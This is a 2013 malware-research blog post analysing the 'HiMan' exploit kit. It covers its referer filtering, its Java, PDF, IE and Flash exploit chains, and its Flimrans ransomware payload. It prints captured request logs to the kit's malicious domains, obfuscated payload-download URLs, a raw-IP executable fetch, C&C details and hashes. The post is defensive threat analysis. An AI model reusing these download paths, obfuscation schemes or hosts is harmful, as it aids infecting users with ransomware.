2013-10-02 - Study

HiMan Exploit Kit. Say Hi to one more.

For the Thumbnail

Yes it's another Exploit Kit. Good news (just because it should be less boring) there is more than two jar in that one.
Thanks to Eoin Miller for the inputs that allowed me to write this post.

from Eoin

Talking about owls, if you never heard of Moloch (link to its presentation at ShmooCon 2013) you should give it a try (link to github) (good pcap indexer...yes...one day, thanks to tools like this, you'll see Pcap here too ;) )

So HiMan is not the real name of this Exploit Kit. It seems to be High Load but as HighLoad is a reputable security conference that stands in Russia we won't use this name. (for the same kind of reasons, we are now talking about what we previoulsy called PopAds as Magnitude).

HiMan EK login Screen - "Power by High Load, 2013"

I didn't heard about any public advert for this Exploit Kit, but ping me if there is and you know where :)

What is tricky with this one is that it seems there is whitelisting filter on referer.

Wrong referer : bye ! (obviously wrong country, wrong browser, known ip..same way).

HiMan driving you out.
Landing > jsdetect > windows.location = out.

(don't know why it's not being done directly on landing... all stats related functions in index ? ).

Post to index.php contains upper referer

Post to index with Correct Referer and Fresh IP.

To study this should help knowing which pierced armor we must show HiMan to get all the bullets :

Conditions allow you to guess what will hit you.
except maybe for IE

CVE-2011-3544 : Java2

(cause CVE-2013-2465 crash for older version of jre6)

GET http://fifallllolka .info/xuguczel.php

200 OK (text/html)

GET http://fifallllolka .info/js/jquery.js

200 OK (application/javascript)

POST http://fifallllolka .info/index.php

200 OK (text/html)

java2 in HiMan 2013-10-02

We can easily see this in the noise.

GET http://fifallllolka .info/xufomav/b.jar

200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627

GET http://fifallllolka .info/com.class 404 Not Found (text/html)

GET http://fifallllolka .info/edu.class 404 Not Found (text/html)

GET http://fifallllolka .info/net.class 404 Not Found (text/html)

GET http://fifallllolka .info/org.class 404 Not Found (text/html)

GET http://fifallllolka .info/com.class 404 Not Found (text/html)

GET http://fifallllolka .info/edu.class 404 Not Found (text/html)

GET http://fifallllolka .info/net.class 404 Not Found (text/html)

GET http://fifallllolka .info/org.class 404 Not Found (text/html)

Getting System Properties for Stats Purposes
Piece of dwq.class in b.jar - HiMan 2013-10-02

And passing them to payload URLs
Piece cdcdc44 class in b.jar - HiMan 2013-10-02

GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16

200 OK (application/octet-stream)

Payload is a zip

a.jar function to deal with the Zip payload
(didn't spent time on it)

containing Flimrans Ransomware :

Flimrans these days
As often with affiliates it's the same icon over every infection vectors :
built / packed at the same place

-----------Out of topic : Payload-----------

Flimrans : 9eb1f89a74e708c27869eadb0b421ca6

(A ransomware that seems to have been first pushed in Flimkit (as dedicated family) in middle of may 2013. This was the same kind of couple as : Kore with Urausy/FakeAV.

I will make a post about it really soon <Done : it's here />. It's starting to be widely spread).

C&C :

95.211.239.222

16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1

Host: utipiguty.de

Cache-Control: no-cache

Analysis by Joe Sandbox Cloud

--------------------------------------------

CVE-2013-2465 : Java1

HiMan CVE-2013-2465 Successful path 2013-10-01

GET http://fifallllllolka .info/sacixudy.php

200 OK (text/html)

GET http://fifallllllolka .info/js/jquery.js

200 OK (application/javascript)

POST http://fifallllllolka .info/index.php

200 OK (text/html)

java1() in HiMan 2013-10-02

GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de

200 OK (application/java-archive)

Piece of CVE-2013-2465 in a.jar

GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45200 OK (application/octet-stream)

CVE-2013-2465 with embedded jnlp (to avoid Security Warning): java3

I'll fly over that one.

CVE-2013-2465 with embedded jnlp pass (the js size 0 is artifact - cached)

GET http://fifalllolka .info/xalbigki.php

200 OK (text/html)

GET http://fifalllolka .info/js/jquery.js

304 Not Modified () (artifact - cached here)

POST http://fifalllolka .info/index.php

200 OK (text/html)

java3 in HiMan 2013-10-02

GET http://fifalllolka .info/jumyvvu/a.jar 4c1aabd2f558c453555da5ff7a7559de (same as previously)

200 OK (application/java-archive)

GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11

200 OK (application/octet-stream)

CVE-2010-0188 :

It's assumption that it's libtiff as there is an Embedded file. Didn't spend enough time on it .Wepawet and VirusTotal were helpless here.

CVE-2010-0188 Successful pass in HiMan 2013-10-02

GET http://aakrinopidarasti .info/vibqilro.php
200 OK (text/html)

GET http://aakrinopidarasti .info/js/jquery.js
200 OK (application/javascript)

POST http://aakrinopidarasti .info/index.php
200 OK (text/html)

GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11
200 OK (application/pdf)

HiMan's PDF in PDFStreamDumper.

The object after some light deobfus
(mainly replacing "hello prettylame iwnzzz" by %)

After the eval

[Have to stop here for now- will digg in it to findout why 2 payloads call ]

<edit1 2013-10-03>

@kafeine I think the payload is the same, but depending on the Adobe reader version the exploit bytes change. hvkhhttgc will be shellcode..
— Jose Miguel Esparza (@EternalTodo) October 3, 2013

@kafeine Shellcode using XOR to decode itself, URLDownloadToCacheFileW to download and CreateProcess to execute it.
— Jose Miguel Esparza (@EternalTodo) October 26, 2013

</edit1>

GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US
200 OK (application/octet-stream) (same Flimrans)

GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1
200 OK (application/octet-stream)

CVE-2013-2551 : (working here....)

Discovered by Vupen and exploited at Pwn2Own 2013

CVE-2013-2551 in HiMan - 2013-10-01

GET http://akrinopidarasti .info/wywetukr.php

200 OK (text/html)

GET http://akrinopidarasti .info/js/jquery.js

200 OK (application/javascript)

POST http://akrinopidarasti .info/index.php

200 OK (text/html)

IE Check Before Fireing
(note : on another pass)

Cleaning to see a little better
(note : it's another pass so pattern do not match this one)

GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79

200 OK (text/html)

Piece of CVE-2013-2551

GET http://37.200.65.58/222.exe

200 OK (application/octet-stream)

92c2ad1ca04e431100313b9468842c0d Content-Length: 1536

VT TimeStamp

What happen once "infected" ?

CVE-2013-2551 Payload

Exploitation Graph :

<edit1 2013-12-02>
CVE-2013-0634 is inside. See :

CVE-2013-0634 (Flash) is in HiMan EK. Post Updated : http://t.co/lKbEWTabh1 Thanks Eoin Miller for inputs. pic.twitter.com/WS51ypkWiJ
— kafeine (@kafeine) December 2, 2013

CVE-2013-0634 (Adobe Flash Player) integrating Exploit Kits
</edit1>
<edit2 2013-12-12>
HiMan EK "Sploit" folder is now randomized and rotating.

Double pass in HiMan EK 2013-12-12

</edit2>

Files :

4 fiddlers and payloads (Owncloud via goo.gl)